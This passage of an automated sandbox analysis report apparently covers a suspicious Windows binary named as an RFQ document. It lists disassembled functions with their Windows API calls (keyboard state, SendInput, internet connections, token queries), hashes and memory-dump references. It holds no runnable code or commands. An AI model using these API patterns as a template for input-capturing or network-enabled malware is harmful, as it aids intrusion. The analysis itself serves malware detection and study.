                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: 1943bec68260a9d38a58ed5e10719509dbed1821cc9c078ea3e31dc9ada5ae7d
                                              • Instruction ID: 083d754dfd3d402e87acf15a4778f4e27f23129e9d0420f9cd6f0234e3cb42e4
                                              • Opcode Fuzzy Hash: 1943bec68260a9d38a58ed5e10719509dbed1821cc9c078ea3e31dc9ada5ae7d
                                              • Instruction Fuzzy Hash: A3314630E40688BEFF358B6A8C05BFABBA9AB58310F08431AF591531F1C3748DC19751
                                              APIs
                                              • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00141176
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00141192
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 001411F1
                                              • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00141243
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: ae1985f189d1c429f22b6da37642a712e5392af0101ca30bbdb68cfa6a9ea93e
                                              • Instruction ID: 2c1bbb106b843c584c816f120ab8018cb989a499b918af70a186d2da0ae6d437
                                              • Opcode Fuzzy Hash: ae1985f189d1c429f22b6da37642a712e5392af0101ca30bbdb68cfa6a9ea93e
                                              • Instruction Fuzzy Hash: 13314630A403187AEF258B75CC18BFABBBAAB59720F18431EE681925F1C3748EC58751
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0011644B
                                              • __isleadbyte_l.LIBCMT ref: 00116479
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001164A7
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001164DD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 8ecfd7ee4c6a6772859f2aa164bd1e6feab4c260b7a6e1397984fda655d6fbde
                                              • Instruction ID: 4a9fe33187c65093922ca4b9c3bba523fd7a0ffb17566f0693a9ce1e87c14595
                                              • Opcode Fuzzy Hash: 8ecfd7ee4c6a6772859f2aa164bd1e6feab4c260b7a6e1397984fda655d6fbde
                                              • Instruction Fuzzy Hash: 7731DE31604256AFDB298F69CC44BFA7BA9FF41310F154079E864879A0EB32D890DB90
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00165189
                                                • Part of subcall function 0014387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00143897
                                                • Part of subcall function 0014387D: GetCurrentThreadId.KERNEL32 ref: 0014389E
                                                • Part of subcall function 0014387D: AttachThreadInput.USER32(00000000,?,001452A7), ref: 001438A5
                                              • GetCaretPos.USER32(?), ref: 0016519A
                                              • ClientToScreen.USER32(00000000,?), ref: 001651D5
                                              • GetForegroundWindow.USER32 ref: 001651DB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: f2cdd3ae61dfd812979fcd98077bc322744aadb6d172a35d0006912cfd8a4fcf
                                              • Instruction ID: bd1fca785166491f320031db1fd8e3c3aed92e0cb033420c783ce6938325e0f6
                                              • Opcode Fuzzy Hash: f2cdd3ae61dfd812979fcd98077bc322744aadb6d172a35d0006912cfd8a4fcf
                                              • Instruction Fuzzy Hash: D5310DB2900148AFDB00EFA5CC859EFB7F9EF98300F10406AE515E7252EB759E45CBA1
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • GetCursorPos.USER32(?), ref: 0016C7C2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0011BBFB,?,?,?,?,?), ref: 0016C7D7
                                              • GetCursorPos.USER32(?), ref: 0016C824
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0011BBFB,?,?,?), ref: 0016C85E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              • Opcode ID: bb2af94a6cc7ea8e5b150e20211f5e46872322b00bdfd8025419a1584711bcbd
                                              • Instruction ID: b6dffd255dcb44d73a0e2198cdf488facd763c24c93eeb2d6bb2da590fef32e7
                                              • Opcode Fuzzy Hash: bb2af94a6cc7ea8e5b150e20211f5e46872322b00bdfd8025419a1584711bcbd
                                              • Instruction Fuzzy Hash: 6831B135601118AFCB25CF59CC98EFABBBAEB49710F048069F9458B261C7319DA1DFA0
                                              APIs
                                                • Part of subcall function 00138652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00138669
                                                • Part of subcall function 00138652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00138673
                                                • Part of subcall function 00138652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00138682
                                                • Part of subcall function 00138652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00138689
                                                • Part of subcall function 00138652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0013869F
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00138BEB
                                              • _memcmp.LIBCMT ref: 00138C0E
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00138C44
                                              • HeapFree.KERNEL32(00000000), ref: 00138C4B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 1592001646-0
                                              • Opcode ID: c743726178cdd8d71d9e3ef22da746937dd201ec4aebfca8f2468f763ba77125
                                              • Instruction ID: 6695dd20317dc54ef96ed3e9743bf33af3e60cb257eca71047d10b24cf14cac6
                                              • Opcode Fuzzy Hash: c743726178cdd8d71d9e3ef22da746937dd201ec4aebfca8f2468f763ba77125
                                              • Instruction Fuzzy Hash: 12219D71E01209EFDB10DFA4C955BEEB7B8FF44354F144059E454A7240DB75AE46CB60
                                              APIs
                                              • __setmode.LIBCMT ref: 00100BF2
                                                • Part of subcall function 000E5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00147B20,?,?,00000000), ref: 000E5B8C
                                                • Part of subcall function 000E5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00147B20,?,?,00000000,?,?), ref: 000E5BB0
                                              • _fprintf.LIBCMT ref: 00100C29
                                              • OutputDebugStringW.KERNEL32(?), ref: 00136331
                                                • Part of subcall function 00104CDA: _flsall.LIBCMT ref: 00104CF3
                                              • __setmode.LIBCMT ref: 00100C5E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              • Opcode ID: 0801c77c337f65ecfec616cb328cb1bf283de1421e3ed48e4588d7c07959f48d
                                              • Instruction ID: f74c88d509c827a30becf204465dfd42ff21251089ecc0a290d72fb354b0cab7
                                              • Opcode Fuzzy Hash: 0801c77c337f65ecfec616cb328cb1bf283de1421e3ed48e4588d7c07959f48d
                                              • Instruction Fuzzy Hash: 3F1136729042047FDB09B7B5AC83AFE7B689F99320F14416AF244A71D2DFA15D828791
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00151A97
                                                • Part of subcall function 00151B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00151B40
                                                • Part of subcall function 00151B21: InternetCloseHandle.WININET(00000000), ref: 00151BDD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: 68d4ac3f31535aba52e24325a41effd6a72d10313d21cf099c176d728e352e48
                                              • Instruction ID: b7c381f7494f4944c87d8b47868cf1ba06d8619eacec81ecf1d3928a995f31c7
                                              • Opcode Fuzzy Hash: 68d4ac3f31535aba52e24325a41effd6a72d10313d21cf099c176d728e352e48
                                              • Instruction Fuzzy Hash: A2219F36200605FFDB179F609C01FBAB7B9FF58702F15401AFE219A650EB7198199BA0
                                              APIs
                                                • Part of subcall function 0013F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0013E1C4,?,?,?,0013EFB7,00000000,000000EF,00000119,?,?), ref: 0013F5BC
                                                • Part of subcall function 0013F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0013F5E2
                                                • Part of subcall function 0013F5AD: lstrcmpiW.KERNEL32(00000000,?,0013E1C4,?,?,?,0013EFB7,00000000,000000EF,00000119,?,?), ref: 0013F613
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0013EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0013E1DD
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 0013E203
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0013EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0013E237
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 543670734aec203bcb73010cca703ef945cbbd29ba964ef7ac9546997ce4218b
                                              • Instruction ID: 9740e01c76696d8c21bda152cda59121bb2a92c1185a2dc70c92d734fa0f09e0
                                              • Opcode Fuzzy Hash: 543670734aec203bcb73010cca703ef945cbbd29ba964ef7ac9546997ce4218b
                                              • Instruction Fuzzy Hash: 47115E3A200345EFDB25AF64DC45A7A77A9FF89350F40402AF816CB2A4EBB19951D7A0
                                              APIs
                                              • _free.LIBCMT ref: 00115351
                                                • Part of subcall function 0010594C: __FF_MSGBANNER.LIBCMT ref: 00105963
                                                • Part of subcall function 0010594C: __NMSG_WRITE.LIBCMT ref: 0010596A
                                                • Part of subcall function 0010594C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000000,?,?,?,00101013,?), ref: 0010598F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: 17f1aafe84d7241244ea7360b9d9adf02d24deb59fdf8f107e727c27150a3a76
                                              • Instruction ID: 44a6edd2812dd7dd3c1f2287aa2f64b9a7a7827384e405928b03a374add5796a
                                              • Opcode Fuzzy Hash: 17f1aafe84d7241244ea7360b9d9adf02d24deb59fdf8f107e727c27150a3a76
                                              • Instruction Fuzzy Hash: 4E110432914A05EFCB292F70AC0469E379A7FA43A0B20453AF8A4971D0DFF089C09750
                                              APIs
                                              • _memset.LIBCMT ref: 000E4560
                                                • Part of subcall function 000E410D: _memset.LIBCMT ref: 000E418D
                                                • Part of subcall function 000E410D: _wcscpy.LIBCMT ref: 000E41E1
                                                • Part of subcall function 000E410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000E41F1
                                              • KillTimer.USER32(?,00000001,?,?), ref: 000E45B5
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000E45C4
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0011D6CE
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: a333bed9cda277e7bf9c97695fb9a54228361f5ef479672cece3d13134d5bb72
                                              • Instruction ID: 700f9c52e80998042cd39f8fd4666a4c06627e23bba13ad0afe98a58ccc2e91f
                                              • Opcode Fuzzy Hash: a333bed9cda277e7bf9c97695fb9a54228361f5ef479672cece3d13134d5bb72
                                              • Instruction Fuzzy Hash: FD210B71904794AFEB778B24EC45BEBBBEC9F01304F04009EE69E66282C7B45AC5CB51
                                              APIs
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001440D1
                                              • _memset.LIBCMT ref: 001440F2
                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00144144
                                              • CloseHandle.KERNEL32(00000000), ref: 0014414D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                              • String ID:
                                              • API String ID: 1157408455-0
                                              • Opcode ID: 41bc095d0ad0e09d632729d0b58a3a4f92808c36e30f416b7e92be2a15cb7493
                                              • Instruction ID: a244a41c043ab179f6fac27fa6b588e300451773f44d366c82f627fd097768cb
                                              • Opcode Fuzzy Hash: 41bc095d0ad0e09d632729d0b58a3a4f92808c36e30f416b7e92be2a15cb7493
                                              • Instruction Fuzzy Hash: 9311CA759012287AE7309BA5AC4DFEBBB7CEF45760F1041AAF908D7190D7744E81CBA4
                                              APIs
                                                • Part of subcall function 000E5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00147B20,?,?,00000000), ref: 000E5B8C
                                                • Part of subcall function 000E5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00147B20,?,?,00000000,?,?), ref: 000E5BB0
                                              • gethostbyname.WSOCK32(?,?,?), ref: 001566AC
                                              • WSAGetLastError.WSOCK32(00000000), ref: 001566B7
                                              • _memmove.LIBCMT ref: 001566E4
                                              • inet_ntoa.WSOCK32(?), ref: 001566EF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: a204817da2ac19a5c4e132f42db60605ad05f0ca4645f8d48038220aeb7362cd
                                              • Instruction ID: 336d8962759f38c02ce016fcd7ae6089b0dcd463513a038d2c9ab15977d8c2a8
                                              • Opcode Fuzzy Hash: a204817da2ac19a5c4e132f42db60605ad05f0ca4645f8d48038220aeb7362cd
                                              • Instruction Fuzzy Hash: 9D119035500509AFCB00EBA5DD86DEEB7B8AF58315B184069F902B7162DF70AE04CBA1
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00139043
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00139055
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0013906B
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00139086
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: cf5f3cf3708747f8e3e07798514b550ee1f2d37a5d92bde5059b0dab500c18f3
                                              • Instruction ID: 7065441f35e084dd80da54b884af3f41e063196ac8a6cd580244b7bc58d59bd3
                                              • Opcode Fuzzy Hash: cf5f3cf3708747f8e3e07798514b550ee1f2d37a5d92bde5059b0dab500c18f3
                                              • Instruction Fuzzy Hash: 56113A79900218BFEB10DFA5C884E9DBB78FB48310F204095E904B7250D7716E50DB90
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DefDlgProcW.USER32(?,00000020,?), ref: 000E12D8
                                              • GetClientRect.USER32(?,?), ref: 0011B84B
                                              • GetCursorPos.USER32(?), ref: 0011B855
                                              • ScreenToClient.USER32(?,?), ref: 0011B860
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 74a5fce837fb29f1ed84328ed46dd0b2be4e5fe68a94afa3fea6049f6862d9f5
                                              • Instruction ID: 63d37f866559a6022dfd991529daf2919017301686502b36126a0bcbb4a0c388
                                              • Opcode Fuzzy Hash: 74a5fce837fb29f1ed84328ed46dd0b2be4e5fe68a94afa3fea6049f6862d9f5
                                              • Instruction Fuzzy Hash: FA114C35900159EFCB10DF95DC859FEB7B8FB05300F000459FA11E7151C770BAA28BA5
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001401FD,?,00141250,?,00008000), ref: 0014166F
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001401FD,?,00141250,?,00008000), ref: 00141694
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001401FD,?,00141250,?,00008000), ref: 0014169E
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,001401FD,?,00141250,?,00008000), ref: 001416D1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: ad1237866a82e180a6f337f77cccf8ff16a02a25676df5c66e304f8cdba57e3e
                                              • Instruction ID: f5ac1998417f8ad885076c26b820bbc52ba7db7f55322e887c63f6c794fccba2
                                              • Opcode Fuzzy Hash: ad1237866a82e180a6f337f77cccf8ff16a02a25676df5c66e304f8cdba57e3e
                                              • Instruction Fuzzy Hash: 9B118E31C0051CE7CF009FA5E948AFEBB78FF09751F464059E940B2250CBB095E18B96
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
